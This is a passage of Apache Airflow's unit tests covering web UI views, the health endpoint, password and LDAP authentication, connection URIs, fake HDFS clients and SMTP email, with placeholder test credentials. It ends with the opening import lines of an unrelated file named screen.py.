self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
BJ = jobs.BaseJob
session = Session()
# case-1: healthy scheduler status
last_scheduler_heartbeat_for_testing_1 = timezone.utcnow()
session.add(BJ(job_type='SchedulerJob',
state='running',
latest_heartbeat=last_scheduler_heartbeat_for_testing_1))
session.commit()
response_json = json.loads(self.app.get('/health').data.decode('utf-8'))
self.assertEqual('healthy', response_json['metadatabase']['status'])
self.assertEqual('healthy', response_json['scheduler']['status'])
self.assertEqual(last_scheduler_heartbeat_for_testing_1.isoformat(),
response_json['scheduler']['latest_scheduler_heartbeat'])
session.query(BJ).\
filter(BJ.job_type == 'SchedulerJob',
BJ.state == 'running',
BJ.latest_heartbeat == last_scheduler_heartbeat_for_testing_1).\
delete()
session.commit()
# case-2: unhealthy scheduler status - scenario 1 (SchedulerJob is running too slowly)
last_scheduler_heartbeat_for_testing_2 = timezone.utcnow() - timedelta(minutes=1)
(session.query(BJ)
.filter(BJ.job_type == 'SchedulerJob')
.update({'latest_heartbeat': last_scheduler_heartbeat_for_testing_2 - timedelta(seconds=1)}))
session.add(BJ(job_type='SchedulerJob',
state='running',
latest_heartbeat=last_scheduler_heartbeat_for_testing_2))
session.commit()
response_json = json.loads(self.app.get('/health').data.decode('utf-8'))
self.assertEqual('healthy', response_json['metadatabase']['status'])
self.assertEqual('unhealthy', response_json['scheduler']['status'])
self.assertEqual(last_scheduler_heartbeat_for_testing_2.isoformat(),
response_json['scheduler']['latest_scheduler_heartbeat'])
session.query(BJ).\
filter(BJ.job_type == 'SchedulerJob',
BJ.state == 'running',
BJ.latest_heartbeat == last_scheduler_heartbeat_for_testing_1).\
delete()
session.commit()
# case-3: unhealthy scheduler status - scenario 2 (no running SchedulerJob)
session.query(BJ).\
filter(BJ.job_type == 'SchedulerJob',
BJ.state == 'running').\
delete()
session.commit()
response_json = json.loads(self.app.get('/health').data.decode('utf-8'))
self.assertEqual('healthy', response_json['metadatabase']['status'])
self.assertEqual('unhealthy', response_json['scheduler']['status'])
self.assertIsNone(response_json['scheduler']['latest_scheduler_heartbeat'])
session.close()
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=missing_dag',
follow_redirects=True)
self.assertIn("seems to be missing", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.post("/admin/airflow/success", data=dict(
task_id="print_the_context",
dag_id="example_python_operator",
success_upstream="false",
success_downstream="false",
success_future="false",
success_past="false",
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
origin="/admin"))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.post('/admin/airflow/clear', data=dict(
task_id="print_the_context",
dag_id="example_python_operator",
future="true",
past="false",
upstream="true",
downstream="false",
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
origin="/admin"))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
form = dict(
task_id="section-1",
dag_id="example_subdag_operator",
success_upstream="true",
success_downstream="true",
success_future="false",
success_past="false",
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
origin="/admin")
response = self.app.post("/admin/airflow/success", data=form)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
form["confirmed"] = "true"
response = self.app.post("/admin/airflow/success", data=form)
self.assertEqual(response.status_code, 302)
form = dict(
task_id="print_the_context",
dag_id="example_python_operator",
future="false",
past="false",
upstream="false",
downstream="true",
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
origin="/admin")
response = self.app.post("/admin/airflow/clear", data=form)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
form["confirmed"] = "true"
response = self.app.post("/admin/airflow/clear", data=form)
self.assertEqual(response.status_code, 302)
form = dict(
task_id="section-1-task-1",
dag_id="example_subdag_operator.section-1",
future="false",
past="false",
upstream="false",
downstream="true",
recursive="true",
execution_date=EXAMPLE_DAG_DEFAULT_DATE,
origin="/admin")
response = self.app.post("/admin/airflow/clear", data=form)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.end",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1.section-1-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-1",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-2",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-3",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-4",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.section-2.section-2-task-5",
response.data.decode('utf-8'))
self.assertIn("example_subdag_operator.some-other-task",
response.data.decode('utf-8'))
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(EXAMPLE_DAG_DEFAULT_DATE))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_partial(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_functool_partial&dag_id=test_task_view_type_check&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("A function with two args", response.data.decode('utf-8'))
def test_dag_view_task_with_python_operator_using_instance(self):
response = self.app.get(
'/admin/airflow/task?'
'task_id=test_dagrun_instance&dag_id=test_task_view_type_check&'
'execution_date={}'.format(EXAMPLE_DAG_DEFAULT_DATE))
self.assertIn("A __call__ method", response.data.decode('utf-8'))
def tearDown(self):
self.dag_bash.clear(start_date=EXAMPLE_DAG_DEFAULT_DATE,
end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
@conf_vars({('webserver', 'authenticate'): 'False', ('core', 'secure_mode'): 'True'})
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
class PasswordUserTest(unittest.TestCase):
def setUp(self):
user = models.User()
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user = PasswordUser(user)
self.password_user.username = "password_test"
@mock.patch('airflow.contrib.auth.backends.password_auth.generate_password_hash')
def test_password_setter(self, mock_gen_pass_hash):
mock_gen_pass_hash.return_value = b"hashed_pass" if six.PY3 else "hashed_pass"
self.password_user.password = "secure_password"
mock_gen_pass_hash.assert_called_with("secure_password", 12)
def test_password_unicode(self):
# In Python 2.7 no conversion back to str is required.
# In Python >= 3 the setter must convert the hash from bytes to str.
self.password_user.password = "secure_password"
self.assertIsInstance(self.password_user.password, str)
def test_password_user_authenticate(self):
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_unicode_user_authenticate(self):
self.password_user.username = u"🐼" # This is a panda
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_authenticate_session(self):
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user.password = 'test_password'
session = Session()
session.add(self.password_user)
session.commit()
query_user = session.query(PasswordUser).filter_by(
username=self.password_user.username).first()
self.assertTrue(query_user.authenticate('test_password'))
session.query(models.User).delete()
session.commit()
session.close()
@conf_vars({('webserver', 'authenticate'): 'True',
('webserver', 'auth_backend'): 'airflow.contrib.auth.backends.password_auth'})
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = BeautifulSoup(response.data, 'html.parser')
return tree.find('input', attrs={'name': '_csrf_token'})['value']
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
@conf_vars({('webserver', 'authenticate'): 'True',
('webserver', 'auth_backend'): 'airflow.contrib.auth.backends.ldap_auth',
('ldap', 'uri'): 'ldap://openldap:389',
('ldap', 'user_filter'): 'objectClass=*',
('ldap', 'user_name_attr'): 'uid',
('ldap', 'bind_user'): 'cn=Manager,dc=example,dc=com',
('ldap', 'bind_password'): 'insecure',
('ldap', 'basedn'): 'dc=example,dc=com',
('ldap', 'cacert'): '',
})
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = BeautifulSoup(response.data, 'html.parser')
return tree.find('input', attrs={'name': '_csrf_token'})['value']
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
@conf_vars({('ldap', 'superuser_filter'): 'description=superuser',
('ldap', 'data_profiler_filter'): 'description=dataprofiler'})
def test_with_filters(self):
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
@conf_vars({('webserver', 'authenticate'): 'True',
('webserver', 'auth_backend'): 'airflow.contrib.auth.backends.ldap_auth',
('ldap', 'uri'): 'ldap://openldap:389',
('ldap', 'user_filter'): 'objectClass=*',
('ldap', 'user_name_attr'): 'uid',
('ldap', 'bind_user'): 'cn=Manager,dc=example,dc=com',
('ldap', 'bind_password'): 'insecure',
('ldap', 'basedn'): 'dc=example,dc=com',
('ldap', 'cacert'): '',
})
class LdapGroupTest(unittest.TestCase):
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
The fake snakebite client.
:param path: the list of paths to query
:param include_toplevel: whether to include the top-level directory info
:return: a list of path entries matching the query
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
utils.db.initdb(rbac=True)
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
class WebHDFSHookTest(unittest.TestCase):
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None
if six.PY2:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
@conf_vars({('email', 'email_backend'): None})
class EmailTest(unittest.TestCase):
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
with conf_vars({('email', 'email_backend'): 'tests.core.send_email_test'}):
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='us-ascii', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
@conf_vars({('smtp', 'smtp_ssl'): 'False'})
class EmailSmtpTest(unittest.TestCase):
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
conf.get('smtp', 'SMTP_USER'),
conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({('smtp', 'smtp_ssl'): 'True'}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({
('smtp', 'smtp_user'): None,
('smtp', 'smtp_password'): None,
}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
screen.py
|
from .streamtools import Stream
from .image import Image
from .rainbow import color, msg
